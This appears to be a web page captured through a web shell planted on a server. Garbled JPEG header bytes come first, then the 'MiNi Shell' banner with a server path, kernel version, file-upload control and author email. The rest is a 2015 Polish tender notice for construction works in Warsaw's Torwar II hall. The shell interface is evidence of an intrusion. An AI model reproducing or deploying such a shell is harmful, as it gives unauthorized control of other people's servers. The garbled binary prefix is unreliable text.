JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151016/276038-N-2015.html

<p class="kh_header"><b>Warszawa: Wykonanie robót budowlanych w obiekcie hali Torwar II</b><br>
<b>Numer ogłoszenia: 276038 - 2015; data zamieszczenia: 16.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Sportu w Warszawie , ul. Łazienkowska 6A, 00-449 Warszawa, woj. mazowieckie, tel. 22 621 10 07, faks 22 628 91 79.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cos.pl/bip</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Gospodarki Budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych w obiekcie hali Torwar II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych w obiekcie hali Torwar II zlokalizowanym przy ulicy Łazienkowskiej 6a w Warszawie (00-449).

Cześć I - Wymiana drzwi wewnętrznych wejściowych do pomieszczeń
Cześć II - Przebudowa i remont łazienek ogólnodostępnych
Cześć III - Wykonanie wykładziny gumowej

Uszczegółowienie przedmiotu zamówienia zawiera Załącznik nr 5 do SIWZ - Opis Przedmiotu Zamówienia oraz dokumentacja..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.21.00.00-2, 45.43.00.00-3, 45.44.00.00-3, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Informacja na temat wadium: 
1.Wykonawca przystępujący do przetargu zobowiązany jest do wniesienia wadium. Wadium należy wnieść przed upływem terminu składania ofert. Za dzień wniesienia wadium w pieniądzu uważa się datę wpływu środków finansowych /wadium/ na rachunek zamawiającego, a nie datę obciążenia rachunku wykonawcy.
2.Ustala się wadium w wysokości:
Część I -  3 000,00 zł (słownie: trzy tysiące złotych 00/100),
Część II -  6 000,00 zł (słownie: sześć tysięcy złotych 00/100),
Część III -  1 000,00 zł (słownie: jeden tysiąc złotych 00/100).
 3. Wadium może być wniesione w jednej lub kilku następujących formach: a) pieniądzu, b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, c) gwarancjach bankowych, d) gwarancjach ubezpieczeniowych, e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275 tj.) Pełne informacje dotyczące wysokości i sposobu wnoszenia wadium zawiera Rozdział 9 SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.9</li>
<li>2 - Okres rękojmi - 0.1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany Umowy wymagają zachowania formy pisemnej pod rygorem nieważności, z uwzględnieniem art. 144 ustawy Prawo zamówień publicznych.
2.	Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	zmiana terminu wykonywania przedmiotu Umowy:
a) zmiany spowodowane warunkami atmosferycznym, odbiegającymi od typowych, uniemożliwiającymi wykonywanie robót budowlanych - fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez Zamawiającego,
b) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymanie robót budowlanych przez Zamawiającego, konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych,
c) zmiany spowodowane działaniem siły wyższej mającej bezpośredni wpływ na wykonywanie przedmiotu Umowy,
d) zmiany spowodowane nieprzewidzianymi w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych warunkami geologicznymi, archeologicznymi lub terenowymi,
e) zmiany spowodowane odmiennymi od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych warunkami geologicznymi, ale istotnymi dla wykonywania przedmiotu Umowy,
f) zmiany spowodowane odmiennymi, ale istotnymi dla wykonywania przedmiotu Umowy, od przyjętych w dokumentacji projektowej  lub specyfikacji technicznej wykonania i odbioru robót budowlanych warunków terenowych, w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych,
g) zmiany spowodowane wystąpieniem zamówień dodatkowych, o których mowa w ustawie - Prawo zamówień publicznych, których wykonanie będzie miało wpływ na termin wykonania przedmiotu Umowy.
2) w przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 1, termin wykonania Umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty.
3)pozostałe zmiany:
a) rezygnacja przez Zamawiającego z wykonywania części przedmiotu Umowy (odstąpienie od części Umowy) - w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie odpowiednio pomniejszone (z uwzględnieniem postanowień kosztorysu ofertowego), przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z Umowy planowanymi świadczeniami,
b) kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami - w takim przypadku zmiany w Umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cos.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centralny Ośrodek Sportu
ul. Łazienkowska 6a
00-449 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.11.2015 godzina 11:00, miejsce: Centralny Ośrodek Sportu
ul. Łazienkowska 6a
00-449 Warszawa
SEKRETARIAT COS.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie zamierza zawrzeć umowy ramowej i ustanowić dynamicznego systemu zakupu. Wybór oferty odbędzie się bez zastosowania aukcji elektronicznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wymiana drzwi wewnętrznych wejściowych do pomieszczeń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prace będą prowadzone w czynnym obiekcie zgodnie z ustalonym i zatwierdzonym przez Dział Techniczno-Administracyjny harmonogramem.
Zakres robót obejmuje prace przewidziane w dokumentacji projektowej i przedmiarze z uwzględnieniem opisu przedmiotu zamówienia:

1.	Wymiany drzwi wewnętrznych wejściowych do pomieszczeń szt. 52, w tym 51 szt. zgodnie z zamieszczoną dokumentacją, na parterze i I piętrze wraz z wykończeniem tynkiem i malowaniem wokół otworów drzwiowych oraz 1 szt. spoza wykazu o wymiarach 80x200 cm oraz dostawa bez montażu 4 szt. drzwi przewidzianych do montażu przez wykonawcę z punktu II.
W drzwiach należy zastosować zamki w systemie master-key działające ze stosowanymi zamkami już w obiektach COS w Warszawie.
Należy przewidzieć zmianę lokalizacji włączników światła w związku z powiększeniem otworów drzwiowych.
Na wszystkich drzwiach należy umieścić nr (zgodne z aktualną numeracją) oraz na drzwiach sanitariatów odpowiednie piktogramy (6 szt.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.21.00.00-2, 45.43.00.00-3, 45.44.00.00-3, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.9</li>
<li>2. Okres rękojmi - 0.1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa i remont łazienek ogólnodostępnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prace będą prowadzone w czynnym obiekcie zgodnie z ustalonym i zatwierdzonym przez Dział Techniczno-Administracyjny harmonogramem.
Zakres robót obejmuje prace przewidziane w dokumentacji projektowej i przedmiarze z uwzględnieniem opisu przedmiotu zamówienia:
Przebudowa i remont łazienek ogólnodostępnych szt. 4 (łazienka nr 3 i 4 na parterze oraz nr 30 i 31 na I piętrze).
Zakres prac obejmuje roboty budowlane, sanitarne i elektryczne - zgodnie z zamieszczoną dokumentacją. 
Prace i do wykonania to między innymi:
1.	Demontaż umywalek wraz z bateriami (8 szt.) i ponowny ich montaż w miejscach określonych w projekcie,
2.	Demontaż misek ustępowych, pisuarów, armatury, krater spustowych, grzejników, orurowania,
3.	Demontaż wywiewników sufitowych i ich ponowny montaż w nowym suficie podwieszonym (7 szt.),
4.	W łazienkach na parterze montaż trzech kratek lub paneli ażurowych w suficie podwieszonym,
5.	Demontaż opraw oświetleniowych i ich ponowny montaż na  nowo wykończonych ścianach. (18 szt. - parter),
6.	 Demontaż opraw oświetleniowych i ich ponowny montaż w nowym suficie podwieszonym i na ścianach (20 szt. - piętro),
7.	Montaż nowych przyborów, wyposażenia metalowego (zgodnie z rys. A4, A 14), luster nad umywalkami, grzejników, armatury,
8.	Należy przewidzieć dołączenie nowych rurociągów do istniejących poza pomieszczeniami remontowanymi,
9.	Należy przewidzieć zmianę lokalizacji włączników światła w związku z powiększeniem otworów drzwiowych,
10.	Roboty budowlane zgodnie z dokumentacją projektową,
11.	Drzwi wejściowe z korytarza do łazienek montowane będą przez wykonawcę montażu drzwi (część I), drzwi (4 szt.) pomiędzy przedsionkiem i toaletą dostarczane będą przez wykonawcę montażu drzwi, z montowane przez wykonawcę części II.
12.	Należy przewidzieć sufity podwieszane oraz przybory sanitarne i armaturę o takim samym wyglądzie jak zastosowane przy remoncie i przebudowie hali..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.21.00.00-2, 45.43.00.00-3, 45.44.00.00-3, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2015.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie wykładziny gumowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prace będą prowadzone w czynnym obiekcie zgodnie z ustalonym i zatwierdzonym przez Dział Techniczno-Administracyjny harmonogramem.
Zakres robót obejmuje prace przewidziane w dokumentacji projektowej i przedmiarze z uwzględnieniem opisu przedmiotu zamówienia:
Wykonanie wykładziny w strefie rozgrzewki zawodników - część południowo - zachodnia hali:
-powierzchnia wykładziny/maty gumowej               	- 220  m2
- cokół/kątownik aluminiowy (20 x50 mm)			- 100 mb
Wykonawca wykona przedmiot umowy z dostarczonych przez siebie materiałów.
Z uwagi, iż miejscem jej układania będzie powierzchnia wokół lodowiska to powinna być odporna na uderzenia i chodzenie w łyżwach. Wytrzymała na niskie temperatury do -40o C i wytrzymała na ciepło do min. + 100oC.  Grubość wykładziny 10 mm. Kolor  czarny z  20% EPDM szaro-niebieski. Gęstość minimum - 1000 kg/m3 +/- 5%.  Wytrzymałość na rozciąganie do 1,3 MPa. Wydłużenie do 62% . Skład wykładziny gumowej - granulat gumowy, spoiwo poliuretan, dodatek kolorowy EPDM.
Wymiary wykładziny -  rolka szer. 125 cm długość dostosowana do długości ciągów komunikacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.21.00.00-2, 45.43.00.00-3, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.12.2015.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com